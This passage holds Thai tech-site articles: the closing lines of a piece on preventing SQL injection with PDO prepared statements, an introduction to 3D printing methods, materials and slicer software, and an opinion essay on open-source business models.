ที่กระบวนการทำงานง่ายกว่า ORM แต่มีกระบวนการกรองอินพุตเช่น $db = new PDO('mysql:host=localhost;dbname=', '', 'PASSWORD'); $stmt = $db->prepare("select contenttype, imagedata from images where id=?"); $stmt->execute(array($_GET\['id'\])); กระบวนการนี้ทำให้ผู้ใช้ที่มุ่งร้ายไม่สามารถสร้างอินพุตที่ทำงานนอกเหนือจากที่โค้ดกำหนดไว้ได้ กระบวนการเจาะเว็บในยุคหลังมีซอฟต์แวร์สามารถสแกนเว็บเพื่อค้นหาช่องโหว่ต่างๆ ได้อย่างมีประสิทธิภาพ การสร้างเว็บในยุคหลังจึงควรทำตามคำแนะนำของเฟรมเวิร์คต่างๆ อย่างระมัดระวัง แต่กระนั้นแม้แต่ระบบจัดการเนื้อหาชื่อดังจำนวนมากก็มีช่องโหว่ค้นพบใหม่อยู่เป็นระยะ การอัพเดตซอฟต์แวร์ให้ทันสมัยเสมอจึงเป็นเรื่องจำเป็น แม้จะเป็นการใช้เฟรมเวิร์คก็ตาม ตัวอย่างจากในบทความนี้นำมาจาก [Wikipedia: Code Injection](https://en.wikipedia.org/wiki/Code_injection), [Wikipedia: SQL Injection](https://en.wikipedia.org/wiki/SQL_injection), และ [PHP Manual: PDO](http://php.net/manual/en/book.pdo.php)
# ตะลุยโลกเครื่องพิมพ์สามมิติ ตอนต้น: สิ่งที่ควรรู้ก่อนซื้อ ก่อนใช้ ท่ามกลางนวัตกรรมใหม่ๆ จำนวนมากที่เกิดดับในช่วงหลายปีที่ผ่านมานี้ ยังมีหนึ่งเทคโนโลยีที่ได้รับความสนใจมากขึ้นเรื่อยๆ จากความสามารถในการดัดแปลงไปใช้กับอุตสาหกรรมได้อย่างกว้างขวาง และเริ่มเข้าไปสู่บ้านของคนทั่วไปมากขึ้น ด้วยราคาของเทคโนโลยีที่กำลังลดลงอยู่ทุกขณะ แน่นอนว่าเทคโนโลยีที่พูดถึงนี้คงหนีไม่พ้นการพิมพ์สามมิติ (3D Printing) หรือพูดให้ถูกกว่าคือการผลิตแบบดิจิทัลที่ลดรูปจากเครื่อง [CNC](http://en.wikipedia.org/wiki/Numerical_control) ที่ใช้ในวงการอุตสาหกรรมนั่นเอง ตัวเครื่องพิมพ์สามมิตินั้นไม่ได้เพิ่งเกิดมาไม่นาน เพราะถูกสร้างมาตั้งแต่ช่วงปี 1984 ด้วยฝีมือของ Chuck Hull ผู้ร่วมก่อตั้งบริษัท 3D Systems Corp ซึ่งได้ไอเดียการพิมพ์สามมิติจากผ้าปูโต๊ะที่แข็งจากรังสีอุลตร้าไวโอเลตซึ่งเป็นต้นแบบของการพิมพ์แบบ "[stereolithography (SLA)](http://en.wikipedia.org/wiki/Stereolithography)" อันเป็นจุดเริ่มต้นของการพิมพ์สามมิติ แต่ก็ใช้เวลาพอสมควรก่อนจะเริ่มได้รับความนิยมเมื่อไม่กี่ปีที่ผ่านมา การมาของเครื่องพิมพ์สามมิติทำให้ผู้คนทั่วไปเข้าถึงกระบวนการผลิตแบบอุตสาหกรรมได้ง่ายขึ้น มีค่าใช้จ่ายที่ถูกลงมาก และนิยมนำไปใช้ในธุรกิจหลายประเภท เน้นไปที่การผลิตสินค้าต้นแบบที่ทำได้ทันที ไม่มีค่าใช้จ่ายจำนวนมาก ไม่ต้องทำเป็นจำนวนเยอะๆ เหมือนระบบที่ใช้ในอุตสาหกรรมอย่างการฉีดพลาสติกเข้าเบ้าหล่อ (mold injection) ที่จะผลิตของหนึ่งชิ้น ต้องทำเบ้าหล่อขึ้นมาเสียก่อน เกริ่นถึงการพิมพ์สามมิติกันมาพอสมควรแล้วเราก็จะมาพูดถึงพระเอกของงานนี้คือตัวเครื่องพิมพ์สามมิติ ว่ามีการทำงานอย่างไรบ้าง ใช้วัสดุอะไรพิมพ์ได้บ้าง และมีอะไรที่ต้องรู้บ้างหากว่าสนใจจะลองสั่งมาใช้งานซักเครื่อง **ที่ว่าพิมพ์สามมิติเขาพิมพ์กันอย่างไร** การพิมพ์สามมิตินั้น มีวิธีการพิมพ์ค่อนข้างหลากหลายตามวัตถุประสงค์การใช้งาน แต่แบบที่ได้รับความนิยมในกลุ่มผู้ใช้ทั่วไปนั้นเรียกว่า fused deposition modeling (FDM) หรือการฉีดพลาสติก และอีกสองแบบที่ควรค่าแก่การกล่าวถึงได้แก่ stereolithography (SLA) คือรูปแบบการพิมพ์สามมิติด้วยการใช้รังสีอัลตร้าไวโอเล็ตทำให้น้ำเรซินแข็งตัว และ laminated object manufacturing (LOM) หรือการพิมพ์ด้วยแผ่นลามิเนต **fused deposition modeling** (FDM) หรือการพิมพ์แบบใช้หัวฉีด เป็นการพิมพ์สามมิติที่ได้รับความนิยมมากที่สุดในตลาด เนื่องจากใช้กับวัสดุได้หลายประเภท รวมถึงต้นทุนที่ถูกกว่าการพิมพ์แบบอื่นทั้งในแง่ของวัสดุ และตัวเครื่องพิมพ์เอง การพิมพ์แบบ FDM จะมีกลไกสำหรับดึงเส้นพลาสติกมาทำความร้อนที่หัวฉีด และฉีดลงไปที่ฐานทีละชั้น ก่อตัวสูงขึ้นเรื่อยๆ โดยมากการพิมพ์แบบ FDM จะถูกใช้สำหรับงานพิมพ์ตัวต้นแบบ (rapid prototype) เพราะตัวงานที่ออกมาจะไม่แข็งแรงนัก และมีพื้นผิวเป็นลายไม้ จำเป็นต้องขัดเก็บงานเสียก่อน หากจะนำไปใช้งานจริง การพิมพ์แบบ FDM ใช้ได้กับวัสดุหลายประเภท ส่วนมากจะจำกัดขนาดเส้นผ่าศูนย์กลางของ filament (เส้นพลาสติก) ไว้ที่ 1.75 มม. และ 3 มม. ที่นิยมใช้กันจะเป็น PLA และ ABS ครับ เดี๋ยวจะอธิบายความต่างของ filament ทั้งสองอย่างในบทต่อไปครับ สำหรับเครื่องพิมพ์แบบ FDM ที่ค่อนข้างเป็นที่นิยมคือ Makerbot ซึ่งปัจจุบันออกมาเป็นรุ่นที่ห้าแล้ว **stereolithography** หรือ SLA เป็นกระบวนการพิมพ์แบบยิงลำแสงอุลตร้าไวโอเลตไปที่ผิวน้ำเรซิน น้ำเรซินจะแข็งตัว และเชื่อมต่อกับเรซินที่แข็งตัวในชั้นก่อนหน้า จุดเด่นของ SLA คือความเร็วในการผลิตที่สูงกว่า FDM อย่างมาก และยังได้ความละเอียดที่เหนือกว่า และได้งานที่ผิวเรียบกว่า (SLA พิมพ์ได้บางสุดชั้นละ 0.05 มม. = 50 ไมครอน ในขณะที่ FDM จะทำได้ราวๆ 100 ไมครอน) สามารถพิมพ์ได้ขนาดใหญ่กว่า เฉลี่ยอยู่ที่ 50x50x60 ซม. แต่ก็แลกกับตัวเครื่องพิมพ์ที่ราคาแพงกว่ามาก พิมพ์ได้เฉพาะกับน้ำเรซินเท่านั้น และตัวน้ำเรซินเองก็แพงพอตัว เทียบกับเส้นพลาสติกแล้วแพงกว่าประมาณ 3-5 เท่า เครื่องพิมพ์สามมิติที่ใช้วิธีการพิมพ์แบบ SLA สำหรับผู้ใช้ทั่วไปในตอนนี้ยังมีเพียงแค่ [The Form 1](http://formlabs.com/products/our-printer) จาก Formlabs อีกแบบที่ได้รับความนิยมเพิ่มขึ้น แต่ยังมีราคาสูงอยู่มากคือ **laminated object manufacturing** (LOM) หรือการพิมพ์ด้วยการตัดแผ่นลามิเนต ซึ่งจะใช้เลเซอร์ หรือมีดตัดแผ่นลามิเนตบนแท่นหมุน และเชื่อมระหว่างเลเยอร์ด้วยกาว จุดเด่นของการพิมพ์แบบ LOM คือความเร็ว และพื้นผิวงานที่ใกล้เคียงผิวไม้ เหมาะสำหรับการทำโมเดล แต่ความละเอียดของงานจะด้อยลงไป จึงต้องมีการเก็บงานที่ดีด้วย การพิมพ์แบบ LOM นั้นใช้วัตถุดิบจากธรรมชาติเป็นหลัก (กระดาษ ไม้ และโลหะ) ทำให้ไม่มีความอันตรายกับมนุษย์ ในขณะเดียวกันต้นทุนของวัตถุดิบก็ถูกเช่นกัน **วัสดุอะไรบ้างที่ใช้กับเครื่องพิมพ์สามมิติได้** เกริ่นนำไปแล้วว่ารูปแบบการพิมพ์ที่นิยมนั้นมีแบบใดบ้าง เมื่อพูดถึงเรื่องพิมพ์แล้ว วัสดุที่นำมาใช้พิมพ์เป็นสิ่งที่ควรคำนึงถึงเป็นอันดับต้นๆ แม้ว่าเครื่องพิมพ์สามมิติในปัจจุบันจะพิมพ์กับวัสดุได้ครอบจักรวาล ตั้งแต่พลาสติก เซรามิก โลหะ กระดาษ คอนกรีต ยาง หรือแม้แต่ของกินอย่างช็อกโกแลต และชีสก็ถูกพิมพ์ไปแล้ว แต่ถ้าพูดถึงวัสดุที่นิยมนำมาใช้พิมพ์กับเครื่องพิมพ์แบบ FDM คงหนีไม่พ้น PLA และ ABS ที่แทบทุกเครื่องพิมพ์รองรับการพิมพ์ด้วยวัสดุสองชนิดนี้อยู่แล้ว ในวงการจะเรียกวัสดุที่ใช้พิมพ์ว่า filament (เส้นพลาสติก) **Polylactic acid** หรือ PLA เป็นพลาสติกชีวภาพที่สามารถย่อยสลายได้ ผลิตขึ้นมาจากพืชอย่าง ข้าวโพด มันสำปะหลัง หรืออ้อย โดยใช้กระบวนการบดพืชให้ละเอียด ย่อยแป้งด้วยเอนไซม์ หมักจนออกมาเป็นกรดแลคติก ท้ายที่สุดคือการกลั่นให่ได้โครงสร้างออกมาเป็นโพลิเมอร์ PLA จัดเป็นวัสดุที่เหมาะแก่การนำมาพิมพ์สามมิติมาก ใช้ความร้อนน้อยกว่าพลาสติกชนิดอื่นที่ 180-220 องศาเซลเซียส ไม่จำเป็นต้องใช้แท่นความร้อนในการพิมพ์ มีความแข็งแรง ไม่เกิดการยกตัว และใช้งานได้กับเครื่องพิมพ์หลายประเภทกว่าวัสดุประเภทอื่นๆ วัสดุที่นิยมนำมาพิมพ์อีกอย่างคือ **Acrylonitrile Butadiene Styrene** (ABS) เป็นพลาสติกที่ใช้กันมากในปัจจุบัน ตัว ABS เป็นเทอร์โมพลาสติกที่เกิดจากการทำปฏิกิริยาของสไตรีน อะคริโลไนไตรล์ และโพลิบิวทาไดอีน ซึ่งผู้ผลิตแต่ละรายจะใช้สัดส่วนของโมโนเมอร์ทั้งสามต่างกันไป เมื่อเทียบกับ PLA แล้ว ABS นั้นให้ผิวหน้าของการพิมพ์ที่คุณภาพสูงกว่า และมีความยืดหยุ่นเหนือกว่า แต่ในการพิมพ์ก็ต้องใช้ความร้อนสูงกว่า (มากกว่า 230 องศาเซลเซียส) จำเป็นต้องมีแท่นความร้อนเพื่อให้พลาสติกเกาะตัว และอาจเกิดการยกตัวของแบบทำให้รูปทรงคลาดเคลื่อน หรือพังไปเลยในบางกรณี นอกจาก PLA และ ABS แล้ว เครื่องพิมพ์แบบ FDM ยังสามารถใช้งานกับ filament แบบอื่นๆ ได้อีกทั้งแบบยืดหยุ่นได้ที่ผสมยางเข้าไป และแบบละลายได้ สำหรับการพิมพ์ที่ซับซ้อนยิ่งขึ้น ([ตัวอย่าง](https://www.thingiverse.com/thing:12342)) ซึ่งจำเป็นต้องใช้งานร่วมกับเครื่องพิมพ์แบบหลายหัวฉีดอีกด้วย **Photopolymer Resin** หรือน้ำเรซิน วัสดุหลัก และหนึ่งเดียวสำหรับการพิมพ์แบบ SLA ลักษณะเป็นของเหลวเหมือนกับที่ใช้ในการหล่อโมเดลทั่วไป แต่ในการพิมพ์สามมิติจะใช้การฉายรังสีอุลตร้าไวโอเลตแทน การใช้น้ำเรซิ่นกับการพิมพ์สามมิติจะต่างกับการพิมพ์แบบฉีดพอสมควรตรงที่ตัวงานจะขึ้นรูปในสภาพแวดล้อมที่มีของเหลวล้อมรอบ โครงสร้างของซัพพอร์ต (ชิ้นส่วนที่ทำให้ตัวแบบคงรูป) จึงไม่จำเป็นต้องแข็งแรงเหมือนการพิมพ์แบบ FDM โดยทั่วไปจะเป็นเส้นตรงเชื่อมกับฐาน และตัวแบบ ในขณะเดียวกันสามารถใช้พิมพ์งานที่ซับซ้อนได้โดยที่ไม่ต้องใช้ filament แบบละลายได้มาเป็นตัวช่วยอีกด้วย ข้อควรระวังคือห้ามให้น้ำเรซิน และตัวแบบสัมผัสกับแสงแดดโดยตรงเป็นเวลานาน เพราะจะทำให้แข็งตัว **รู้จักกับโปรแกรมสำหรับการพิมพ์สามมิติ** เมื่อมีเครื่องพิมพ์สามมิติ และวัสดุสำหรับพิมพ์พร้อมแล้ว สิ่งที่จะทำให้ทั้งสองอย่างนี้ทำงานร่วมกันได้ก็คือโปรแกรมสำหรับสั่งงานให้ตัวเครื่อง ในวงการพิมพ์สามมิติเรียกโปรแกรมกลุ่มนี้ว่า Slicer Slicer มีอยู่หลายตัว โดยมากเป็นโปรแกรมดาวน์โหลดฟรีสำหรับใช้งานร่วมกับเครื่องพิมพ์ชนิดนั้นๆ ความสามารถหลัก คือการเรนเดอร์ไฟล์โมเดลสามมิติ (โดยมากเป็นสกุล STL) และจัดเรียงบนแท่นพิมพ์ นอกจากนี้ตัว Slicer สามารถตั้งค่าเครื่องพิมพ์ได้แทบทุกอย่าง เช่นอุ่นแท่นความร้อน อุ่นหัวฉีด และการตั้งค่าหัวฉีด (calibrate) ซึ่งตรงนี้ต้องทำร่วมกับการปรับฮาร์ดแวร์จริงๆ ด้วย Slicer ที่หาได้ในตอนนี้จะมีทั้งแบบที่เป็น Slicer เพียวๆ คือสามารถสั่งให้พิมพ์ได้อย่างเดียว ตั้งค่าตัวเครื่องไม่ได้ละเอียด เช่น [Cura](https://www.ultimaker.com/pages/our-software) หรือเป็นโปรแกรมที่ตั้งค่าตัวเครื่องได้ด้วยอย่าง Repetier และ RepricatorG ในตลาดนี้ แม้แต่ไมโครซอฟท์ก็เพิ่งออก Slicer ของตัวเองอย่าง [3D Printing](https://www.blognone.com/node/50835) มาเช่นกัน ซึ่งรายละเอียดของการใช้ Slicer เพื่อพิมพ์สามมิติเราจะมาลงลึกกันในตอนต่อไปครับ **อนาคตของการพิมพ์สามมิติ และข้อจำกัดที่ต้องก้าวต่อไป** ในตอนนี้ การพิมพ์สามมิติเรียกได้ว่าเป็นที่รู้จักในกลุ่มผู้บริโภคเป็นที่เรียบร้อยแล้ว และเริ่มมีการใช้ชิ้นส่วนจากการพิมพ์สามมิติในระดับธุรกิจมากขึ้นเรื่อยๆ ด้วยจุดแข็งทั้งในเรื่องของต้นทุนที่ต่ำ สามารถพิมพ์ได้จากที่บ้าน และตัวแบบสามารถปรับแต่งได้ด้วยตัวเอง ในฝั่งของธุรกิจไอทีการนำเทคโนโลยีการพิมพ์สามมิติไปใช้จะเป็นส่วนของการทำผลิตภัณฑ์รุ่นต้นแบบ แต่ถ้าในระดับประเทศก็มีบางรายไปไกลถึงขั้นเอาไป[สร้างบ้าน](https://www.blognone.com/node/55728)กันแล้ว การเคลื่อนไหวในวงการเครื่องพิมพ์สามมิติในช่วงที่ผ่านมาก็เพิ่งมีผู้ผลิตรายหนึ่งสามารถทำเครื่องที่สามารถพิมพ์แบบ[ผสมสีในตัว](https://www.blognone.com/node/52823)ได้แล้ว โดยก่อนหน้านี้สามารถพิมพ์ได้เฉพาะแค่สีตามแต่ filament ที่เลือกไว้เท่านั้น ไม่ว่าจะใช้เครื่องพิมพ์รุ่นที่มีหัวฉีดเดี่ยว หรือแบบหลายหัวฉีดก็ตาม ภาพรวมของอุตสาหกรรมจึงเป็นการพัฒนาให้สามารถพิมพ์ได้เร็วขึ้น และขนาดใหญ่ขึ้นเรื่อยๆ ด้วยความที่เครื่องพิมพ์สามมิติทำให้ผู้ใช้สามารถผลิตสิ่งที่ต้องการขึ้นมาด้วยตัวเองโดยไม่ต้องมีใบอนุญาต ขอเพียงแค่มีไฟล์แบบพิมพ์ก็พอ เมื่อเร็วๆ นี้จึงมีประเด็นการ[พิมพ์ปืน Liberator](https://www.blognone.com/node/44107) ขึ้นมา ซึ่งสามารถใช้งานได้จริงเป็นครั้งแรก จนถูกร้องขอให้เอาไฟล์ลงจากเว็บไซต์ในภายหลัง นำไปสู่การเสนอแนวทางป้องกันจากผู้ผลิตรายหนึ่งที่จะ[บล็อคไม่ให้เครื่องพิมพ์ทำงาน](https://www.blognone.com/node/45829) ถ้าหากตรวจพบว่าตัวแบบนั้นคือปืน สำหรับตอนต่อไปของการตะลุยโลกเครื่องพิมพ์สามมิติจะพาไปดูขั้นตอนการพิมพ์จริงๆ ตั้งแต่การเลือกวัสดุ การตั้งค่าเครื่อง การใช้งาน Slicer และทริกในการใช้งานเครื่องพิมพ์สามมิติที่ค่อนข้างจุกจิกกว่าที่คิดไปมากๆ ครับ
# การดำเนินทำธุรกิจด้วยโอเพนซอร์ส เหมือนจะกลายเป็นธรรมเนียมปฏิบัติไปแล้ว เมื่อมีข่าวเกี่ยวกับความขัดแย้งระหว่างซอฟแวร์ที่ฝั่ง โอเพนซอร์ส (ต่อไปจะเรียก OSS) กับฝั่ง Proprietary Software (ต่อไปจะเรียก PS) ก็จะมีการถกเถียง แลกเปลี่ยนประเด็นและความคิดเห็นกันอย่างกว้างขวาง ซึ่งส่วนมากก็มักจะเป็นประเด็นเดิม ๆ หัวข้อเดิม ๆ ที่ผมอ่านมาตั้งแต่เริ่มสนใจพัฒนาซอฟแวร์ใหม่ ๆ (ราว ๆ ปี 2002 เห็นจะได้) จากการลงข่าว [WikiLeaks: ไมโครซอฟท์และ BSA กังวลต่อแนวทางโอเพนซอร์สของไทย](http://www.blognone.com/news/26164) ใน blognone และก็เหมือนทุก ๆ ครั้งที่ผ่านมา ก็จะมีการแลกเปลี่ยนความคิดเห็นกันอย่างกว้างขวาง ซึ่งพอจะสรุปเป็นความคิดเห็นมีอยู่ 2 ประเด็นหลัก ๆ ดังนี้ **หมายเหตุ** บทความนี้ดัดแปลงจากบทความ [Business Model for Open Source Software](http://www.ximplesoft.com/blog_edit/91) เผยแพร่ที่ [XimpleSoft](http://www.ximplesoft.com/) 1. **quality & usability** คนที่สนับสนุน PS มักจะตั้งป้อมไว้ว่า OSS ส่วนมากคุณภาพต่ำ ไม่เสถียร ไม่สมบูรณ์ ใช้ยาก มีฟังก์ชันต่าง ๆ ไม่ครบส่วนคนที่สนับสนุน OSS มักยืนยันว่าไม่จริง เพราะเราก็ใช้อยู่ ที่คุณว่าใช้ยาก เพราะคุณไม่คิดจะเรียนรู้ต่างหาก 2. **การทำธุรกิจ** คนที่สนับสนุน PS มักจะคิดว่า OSS ไม่เหมาะกับการทำธุรกิจ เพราะพัฒนาซอฟต์แวร์แล้วแจกฟรี บริษัทจะหารายได้จากไหน ส่วนคนที่สนับสนุน OSS ก็จะบอกว่า ไม่จริง เพราะหลาย ๆ บริษัทก็สามารถทำกำไรได้จาก OSS สำหรับข้อมูลในส่วนของผู้ใช้ ที่น่าสนใจมากอีกแหล่งคือ [Romance of the Three (Software) Kingdoms](http://thep.blogspot.com/2009/10/romance-of-three-software-kingdoms.html) เป็นการนำเสนอภาพรวมของคนใช้ซอฟต์แวร์ 3 กลุ่มคือ OSS, PS และ ละเมิดลิขสิทธิ์ ขอออกตัวไว้ก่อนเลยครับว่า ผมเป็นคนสนับสนุน OSS สำหรับในเรื่อง usability ที่คนที่ใช้งาน PS พูดถึง ผมเห็นด้วยและไม่เห็นด้วยบางส่วน เพราะซอฟต์แวร์หลาย ๆ ตัวที่เป็น OSS แล้วมี usability ที่ต่ำจริง ๆ เช่น [GIMP](http://www.gimp.org/), [LibreOffice](http://www.libreoffice.org/) (ดันสำคัญทั้งสองตัวเสียด้วยสิ) หรือไม่เสถียรจริง ๆ เช่น [Inkscape](http://www.inkscape.org/) แต่ก็มี OSS อีกจำนวนหนึ่ง ซึ่งมีคุณภาพเทียบเท่า PS หรือบางตัวอาจดีกว่าด้วยซ้ำเช่น FireFox, Chromium, Drupal, Apache, PHP, MySQL, PostgreSQL (ทำไมมันเกี่ยวกับเว็บไซท์หมดเลยหว่า?) เรื่องนี้ผมยืนยันว่า หากจำเป็นต้องใช้งาน PS โดยเฉพาะคนที่ใช้ PS เป็นเครื่องมือทำมาหากิน ก็จำเป็นต้องซื้อ อย่าละเมิดลิขสิทธิ์ มาเข้าถึงประเด็นสำคัญคือ Business Model หรือวิธีการทำธุรกิจด้วย OSS ผมไม่เห็นด้วยแน่นอนว่า OSS ไม่เหมาะกับการทำธุรกิจ โดยดูได้จากตัวอย่างบริษัทไอทีมากมายทั่วโลก ที่ใช้ OSS เป็นส่วนขับเคลื่อน มากบ้าง น้อยบ้าง ตามแต่นโยบายของแต่ละที่ ซึ่งผมขอแยกลักษณะการทำธุรกิจที่เกี่ยวข้องกับ OSS ดังนี้ **OSS ในฐานะเครื่องมือ** บริษัทไอทีจำนวนมากจะรู้ตัวหรือไม่รู้ตัว ได้ใช้ OSS เป็นเครื่องมือในการขับเคลื่อนธุรกิจของบริษัท หากจะให้ยกตัวอย่างยักษ์ใหญ่ก็มี - Facebook ที่ Platform ของ Facebook เกือบทั้งหมดสร้างขึ้นจาก OSS (PHP, Cassandra, HipHop) แล้วมาปรับแต่งบางส่วนให้เหมาะสมกับการใช้งาน - Twitter คล้าย ๆ Facebook - Apple ระบบปฏิบัติการ [Mac OS X](http://en.wikipedia.org/wiki/Mac_OS_X) มีรากฐานมาจาก [FreeBSD](http://en.wikipedia.org/wiki/FreeBSD) และยังนับรวมถึงบริษัทที่ใช้ PHP, Java, MySQL, Linux, Apache, Drupal, Joomla, etc. เป็นเครื่องมือในการทำธุรกิจ หากพิจารณาบริษัทไอทีที่ทำงานเกี่ยวกับ web-based ผมไม่มีตัวเลขที่ชัดเจน แต่เดาว่ามีบริษัทเกินครึ่ง ที่มีส่วนเกี่ยวข้องกับ OSS ในฐานะเครื่องมือ ข้อดีของการใช้ OSS ในฐานะเครื่องมือคือ - ประหยัดงบประมาณ อันนี้ชัดเจนตรงตัว - อิสรภาพในการทำงาน ประเด็นนี้เป็นประเด็นที่สำคัญมาก แต่หลายคนมองข้าม ลองนึกดูว่าเราต้องทำงานด้วย PS ที่ต้องซื้อลิขสิทธิ์ และติดตั้งได้บนจำนวนเครื่องที่จำกัด หากวันหนึ่ง เราต้องทำงานด้วยเครื่องอีกเครื่องหนึ่ง (เช่น ทำงานนอกสถานที่) ซึ่งไม่ได้ลงเครื่องมือที่เราใช้ เราจะทำอย่างไร แต่หากเราใช้ OSS เป็นเครื่องมือ เพียงแค่มีอินเทอร์เนต เราก็สามารถทำงานได้บนทุกเครื่องที่เราต้องการ - การสร้างบุคลากร หากเครื่องมือที่ใช้ในบริษัท เป็นเครื่องมือที่หาง่าย ราคาถูก การสร้างบุคลากรก็ง่ายขึ้นด้วย เพราะเป็นการลดความเสียงในการลงทุนเพื่อการศึกษา ดังนั้น จะเห็นได้ว่าบริษัท PS จำนวนมาก พยายามออกซอฟต์แวร์เวอร์ชันฟรี หรือราคาถูกเพื่อการศึกษา เพื่อที่จะได้สร้างบุคลากรสำหรับซอฟต์แวร์ของตนเอง ซึ่งแน่นอนว่าหน้าที่ของ OSS ในลักษณะนี้ เราจะคาดหวังให้บริษัทต่าง ๆ contribute หรือมีส่วนร่วมในงานบางอย่าง เพื่อกลับไปสู่โครงการ OSS คงไม่ได้ แต่ส่วนมากแล้วบริษัทต่าง ๆ จะมีส่วนร่วมกับโครงการ OSS เพื่อตอบสนองความต้องการของตัวเอง เพื่อพัฒนา OSS ที่ใช้เป็นเครื่องมือ ในส่วนที่ยังตอบโจทย์ของบริษัทได้ไม่ดีนัก การมีส่วนร่วมลักษณะนี้ถือว่าเป็นการสร้างผลประโยชน์ต่างตอบแทนที่ดีมากวิธีหนึ่ง **OSS ในฐานะสินค้า** การทำธุรกิจลักษณะนี้หากเทียบอัตราส่วนแล้วถือว่าน้อย เมื่อเทียบกับ OSS ในฐานะเครื่องมือ สาเหตุง่าย ๆ ก็เพราะว่า หากมี OSS ที่ฟรีอยู่แล้ว ใครจะมาเสียเงินซื้อซอฟต์แวร์ แต่ก็มี OSS จำนวนหนึ่ง ที่มีสัญญาอนุญาตในลักษณะ Dual Licensing กล่าวคือ จะมีการแยกแยะระหว่าง การนำซอฟต์แวร์ไปใช้งานเชิงพาณิชย์ และการนำซอฟต์แวร์ไปใช้ในลักษณะอื่น ๆ ซึ่งบริษัทผู้ผลิตซอฟต์แวร์ก็จะเก็บเงินจากหน่วยงานที่นำซอฟต์แวร์ไปใช้งานเชิงพาณิชย์ หรืออีกลักษณะที่มีการทำกันค่อนมากคือ การแยกซอฟต์แวร์ออกเป็น 2 เวอร์ชัน คือ เวอร์ชันที่เป็น PS และเวอร์ชันที่เป็น OSS (แตกต่างจาก Dual Licensing ตรงที่ Dual Licensing มีแค่เวอร์ชันเดียว) คำถามคือ ทำไมพัฒนาซอฟต์แวร์เป็นสินค้าโดยตรง (PS) ทำไมถึงต้องทำควบคู่กัน (OSS + PS) แนวคิดการทำธุรกิจในลักษณะนี้คือ - เป็นการทำการตลาดให้กับซอฟต์แวร์ ด้วยการให้คนได้นำไปใช้ในลักษณะ OSS - เป็นการเพิ่มความน่าเชื่อถือให้กับซอฟต์แวร์ จากปริมาณผู้ใช้ซอฟต์แวร์ผ่าน OSS และเป็นการเพิ่มความมั่นใจให้กับลูกค้าว่า ถึงแม้วันหนึ่งบริษัทผู้ผลิตอาจอยู่ไม่รอด แต่ตัวซอฟต์แวร์ยังคงอยู่รอด ด้วยโมเดลของ OSS - เป็นการนำการมีส่วนร่วมของชุมชนมาใช้ให้เป็นประโยชน์ ในหลาย ๆ โครงการ การมีส่วนร่วมจากชุมชน OSS อาจมากกว่าส่วนที่บริษัทพัฒนาเองด้วยซ้ำ ซึ่งเป็นสิ่งที่ไม่สามารถทำได้เสมอไป ต้องอาศัยการผลักดันเรื่องชุมชน OSS ในหลาย ๆ จุด **OSS ในฐานะการสร้างคู่แข่งทางธุรกิจเพื่อความเชื่อมั่น** อาจฟังดูแปลก ๆ แต่ลองนึกดูครับว่า หากเราสร้างเทคโนโลยีใหม่ขึ้นมาหนึ่งอย่าง และเราเป็นบริษัทหน้าใหม่ สิ่งที่ลูกค้าจะถามคือ "เราจะมั่นใจในเทคโนโลยีของคุณได้อย่างไร?" แน่นอน เราสามารถสร้างความเชื่อมั่นในลักษณะอื่น ๆ ได้ แต่ทั้งนี้ การมีคู่แข่งทางธุรกิจ ที่ทำงานลักษณะเดียวกัน จะเพิ่มความมั่นใจให้กับลูกค้าได้อีกระดับหนึ่ง เพราะการที่มีบริษัทอื่น ๆ นอกเหนือจากบริษัทผู้ผลิตสนใจในเทคโนโลยีดังกล่าว แสดงให้เห็นว่าเทคโนโลยีได้ผ่านการตรวจสอบจากบริษัทที่นำไปใช้แล้วระดับนึง **OSS ในฐานะใบเบิกทาง** ในหลาย ๆ กรณี OSS ไม่สามารถสร้างผลประโยชน์ทางธุรกิจด้วยตัวมันเองได้ แต่สามารถสร้างผลประโยชน์ทางธุรกิจให้กับผู้ผลิต ด้วยสภาพแวดล้อมอื่น ๆ ที่อยู่รอบ ๆ ตัวมันได้ โดยใช้ OSS เป็นตัวเบิกทาง โดยธุรกิจแวดล้อม OSS อาจมีความเป็นไปได้ดังนี้ - **ขายบริการหลังการขาย** เป็นการทำธุรกิจที่เป็นที่นิยมใช้พอสมควร เพราะมีบริษัทจำนวนมาก ที่สนใจอยากใช้ OSS แต่ไม่สามารถหาคนให้บริการหลังการขาย หรือการติดตั้งได้ ซึ่งตรงนี้จะมีผลกับการตัดสินใจของผู้ใช้อย่างมาก (โดยเฉพาะหากผู้ใช้สามารถหาคนรับผิดชอบได้ เมื่อซอฟต์แวร์มีปัญหา) และโดยส่วนมากแล้ว ผู้ใช้ยินดีที่จะจ่ายเงินในส่วนนี้ ในฐานะผู้ผลิต เราสามารถขายสินค้าได้ง่ายขึ้น (เพราะราคาเป็น 0) ประหยัดค่าใช้จ่ายในการผลิตลงไปได้ หากสามารถสร้างชุมชนมามีส่วนร่วมในการพัฒนาซอฟต์แวร์ที่เราผลิตได้ การดำเนินการลักษณะนี้ ถือว่าได้ผลประโยชน์ร่วมกันทุกฝ่าย (ผู้ซื้อ ซื้อของถูก, ชุมชนได้ใช้ของฟรี ปรับแต่งซอฟต์แวร์ได้ตามต้องการ) และเป็นแนวทางที่น่าสนใจอย่างมาก - **ขายส่วนเสริม** การทำธุรกิจนี้เป็นที่นิยมอย่างมากสำหรับงานที่เกี่ยวข้องกับเว็บไซท์ ที่ใช้ CMS เป็นฐานในการสร้างเว็บไซท์ โดยตัว CMS เองเป็น OSS แต่บริษัทสามารถขายส่วนเสริมให้กับลูกค้าได้ หรือพัฒนาส่วนเสริมตามความต้องการของลูกค้า ในส่วนนี้จะสามารถลดค่าใช้จ่ายได้ทั้งฝั่งผู้ซื้อ และผู้ผลิต เพราะไม่ต้องพัฒนาซอฟต์แวร์พื้นฐานใหม่ทั้งหมด - **ขายสิ่งแวดล้อมอื่น ๆ** ที่อยู่รอบ ๆ ตัวอย่างที่ดีที่สุดของการทำธุรกิจนี้คือ Android ที่ Google ไม่ได้มีรายได้จากการขาย Android แต่ Google มีรายได้จากการโฆษณาผ่านการใช้ Android แน่นอนว่า การทำธุรกิจลักษณะนี้ จะเน้นการโฆษณาเป็นหลัก แต่ทั้งนี้ ก็มีการสร้างรายได้ด้วยวิธีอื่น ๆ ได้เช่นกัน **บทสรุป** จะเห็นได้ว่าการทำธุรกิจด้วย OSS มีให้เลือกใช้มากมายหลายลักษณะ และหลาย ๆ อย่างก็ผ่านการพิสูจน์มานับครั้งไม่ถ้วน ว่าได้ผล แต่ทั้งนี้การทำธุรกิจทุกรูปแบบที่เขียนถึง เป็นรูปแบบการทำธุรกิจที่คนทำธุรกิจโดยทั่วไปไม่คุ้นชิน 